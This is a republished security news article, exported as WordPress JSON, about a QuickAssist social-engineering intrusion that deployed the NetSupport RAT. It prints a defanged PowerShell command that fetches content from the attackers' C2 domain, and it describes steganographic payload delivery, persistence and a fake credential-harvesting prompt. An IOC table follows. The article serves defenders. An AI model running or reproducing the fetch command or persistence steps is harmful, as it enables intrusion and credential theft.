{"id":5950,"date":"2025-08-07T10:01:30","date_gmt":"2025-08-07T10:01:30","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/08\/07\/hackers-uses-social-engineering-attack-to-gain-remote-access-in-300-seconds\/"},"modified":"2025-08-07T10:01:30","modified_gmt":"2025-08-07T10:01:30","slug":"hackers-uses-social-engineering-attack-to-gain-remote-access-in-300-seconds","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/08\/07\/hackers-uses-social-engineering-attack-to-gain-remote-access-in-300-seconds\/","title":{"rendered":"Hackers Uses Social Engineering Attack to Gain Remote Access in 300 Seconds"},"content":{"rendered":"<p>    Hackers Uses Social Engineering Attack to Gain Remote Access in 300 Seconds<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>Threat actors successfully compromised corporate systems within just five minutes using a combination of <a href=\"https:\/\/cybersecuritynews.com\/social-engineering-tactics\/\" target=\"_blank\" rel=\"noreferrer noopener\">social engineering<\/a> tactics and rapid PowerShell execution.\u00a0<\/p>\n<p>The incident, investigated by NCC Group\u2019s Digital Forensics and Incident Response (DFIR) team, demonstrates how cybercriminals are weaponizing trusted business applications to bypass traditional security measures.<\/p>\n<pre class=\"wp-block-preformatted\"><strong><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">Key Takeaways<\/mark><\/strong><br>1. Hackers impersonated IT support to gain QuickAssist remote access and compromised it in under 5 minutes.<br>2. Deployed NetSupport Manager RAT.<br>3. Legitimate tools weaponized through social engineering, requiring better user training.<\/pre>\n<h2 class=\"wp-block-heading\" id=\"h-quickassist-attack-300-second-compromise\"><strong>QuickAssist Attack: 300-Second Compromise<\/strong><\/h2>\n<p>The threat actors executed a carefully orchestrated campaign targeting approximately twenty users by impersonating IT support personnel.\u00a0<\/p>\n<p>Successfully convincing two victims to grant remote access, the attackers exploited Windows\u2019 native QuickAssist.exe <a href=\"https:\/\/cybersecuritynews.com\/top-5-remote-access-and-rmm-tools-most-abused-by-threat-actors\/\" target=\"_blank\" rel=\"noreferrer noopener\">remote support tool<\/a> to establish an initial foothold.\u00a0<\/p>\n<p>Within 300 seconds of gaining access, the adversaries deployed a series of PowerShell commands that downloaded offensive tooling and established multiple persistence mechanisms.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXepPANtMb2-toLa7_Tf-m8I3H42Ibct987SveWk0Ybt7y2zRPD3itdZ6cBlv-5XYHeti0_EUrMSS0MYOL6qDUTOHP2l_eJcdNWIsleEW3uVYO651jUyQwn3qtlNGGXpLanYrNRL?key=6YugqrMvWxLdjnp_E2agFg\" alt=\"\"><\/figure>\n<\/div>\n<p>The attack sequence began with clipboard manipulation using the command (curl hxxps:\/\/resutato[.]com\/2-4.txt).Content | Set-Clipboard, followed by the execution of obfuscated PowerShell scripts, reads the <a href=\"https:\/\/www.nccgroup.com\/research-blog\/rapid-breach-social-engineering-to-remote-access-in-300-seconds\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">report<\/a>.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXc5rHFvwqPW-bHatfwuCbZTeGy5C5_rf8_ZIT4GQNx5f-LkOsAya99Juaj7MxXZnOcbuFoN_96tVh8J1oIVLzymKlwUOP--BV7XzwcWAH46LUhfV2H5oYenTp4p-0yLa5nhQwPylg?key=6YugqrMvWxLdjnp_E2agFg\" alt=\"\"><\/figure>\n<\/div>\n<p>The primary payload download occurred through a sophisticated steganographic technique, where malicious code was embedded within a JPEG file hosted at hxxps:\/\/resutato[.]com\/b2\/res\/nh2.jpg.\u00a0<\/p>\n<p>The script employed XOR decryption with a 4-byte marker (0x31, 0x67, 0xBE, 0xE1) to extract and reconstruct a ZIP archive containing NetSupport Manager components, disguised as \u201cNetHealth\u201d software.<\/p>\n<h2 class=\"wp-block-heading\" id=\"h-nbsp-credential-harvesting\"><strong>\u00a0Credential Harvesting<\/strong><\/h2>\n<p>The attackers demonstrated advanced tradecraft by implementing multiple persistence mechanisms.\u00a0<\/p>\n<p>They created scheduled tasks configured to execute every five minutes using regsvr32.exe with randomized DLL names, and established registry persistence via HKCUSOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUNNETHEALTH.\u00a0<\/p>\n<p>The malware utilized legitimate binaries like msiexec.exe and GenUp.exe for DLL side-loading attacks, deploying the trojanized libcurl.dll component.<\/p>\n<p>Perhaps most concerning was the deployment of a sophisticated credential harvesting GUI that mimicked legitimate system authentication prompts.\u00a0<\/p>\n<p>The PowerShell-based interface (C:Users{username}Videosl.ps1) created a full-screen overlay with a convincing \u201cSystem Credential Verification\u201d dialog, capturing plaintext credentials to $env:TEMPcred.txt.\u00a0<\/p>\n<p>The interface disabled critical Windows functions, including taskbar access and various keyboard shortcuts, to prevent user escape.<\/p>\n<p><a href=\"https:\/\/cybersecuritynews.com\/command-and-controlc2-server\/\" target=\"_blank\" rel=\"noreferrer noopener\">Command and Control communication<\/a> was established with multiple domains, including resutato[.]com and nimbusvaults[.]com, enabling remote management capabilities.\u00a0<\/p>\n<p>The attack\u2019s success underscores the critical need for enhanced user awareness training and robust incident response capabilities, as even brief security breaches can result in significant organizational compromise.<\/p>\n<figure class=\"wp-block-table\">\n<table class=\"has-fixed-layout\">\n<thead>\n<tr>\n<th>Value<\/th>\n<th>Type<\/th>\n<th>Comment<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><code>resutato[.]com<\/code><\/td>\n<td>Domain<\/td>\n<td>Command &amp; Control<\/td>\n<\/tr>\n<tr>\n<td><code>hxxps:\/\/resutato[.]com\/b2\/st\/st[.]php<\/code><\/td>\n<td>URL<\/td>\n<td>Command &amp; Control + Malware download<\/td>\n<\/tr>\n<tr>\n<td><code>hxxps:\/\/resutato[.]com\/2-4.txt<\/code><\/td>\n<td>URL<\/td>\n<td>Malware download<\/td>\n<\/tr>\n<tr>\n<td><code>hxxp:\/\/196.251.69[.]195<\/code><\/td>\n<td>URL<\/td>\n<td>Malware download<\/td>\n<\/tr>\n<tr>\n<td><code>196.251.69[.]195<\/code><\/td>\n<td>IP Address<\/td>\n<td>Malware download<\/td>\n<\/tr>\n<tr>\n<td><code>4e57ae0cc388baffa98dd755ac77ee3ca70f2eaa<\/code><\/td>\n<td>SHA1<\/td>\n<td>libcurl.dll<\/td>\n<\/tr>\n<tr>\n<td><code>df3125365d72abf965368248295a53da1cdceabe<\/code><\/td>\n<td>SHA1<\/td>\n<td>Update.msi<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 94%,rgb(169,184,195) 100%)\">Equip your SOC with full access to the latest threat data from <strong>ANY.RUN TI Lookup<\/strong> that can Improve incident response -&gt; <strong><a href=\"https:\/\/any.run\/threat-intelligence-feeds\/?utm_source=csn_aug&amp;utm_medium=article&amp;utm_campaign=how-to-get-real-time-iocs&amp;utm_content=feeds-cta1&amp;utm_term=050825#contact-sales\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Get 14-day\u00a0Free\u00a0Trial<\/a><\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/hacked-in-300-seconds\/\">Hackers Uses Social Engineering Attack to Gain Remote Access in 300 Seconds<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Florence Nightingale<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/hacked-in-300-seconds\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hackers Uses Social Engineering Attack to Gain Remote Access in 300 Seconds Threat actors successfully compromised corporate systems within just five minutes using a combination of social engineering tactics and rapid PowerShell execution.\u00a0 The incident, investigated by NCC Group\u2019s Digital Forensics and Incident Response (DFIR) team, demonstrates how cybercriminals are weaponizing trusted business applications to [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[701,1636,129,63,156],"tags":[130],"class_list":["post-5950","post","type-post","status-publish","format-standard","hentry","category-cyber-attack","category-cyber-attack-news","category-cyber-security","category-cyber-security-news","category-data-breach","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/5950"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=5950"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/5950\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=5950"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=5950"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=5950"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}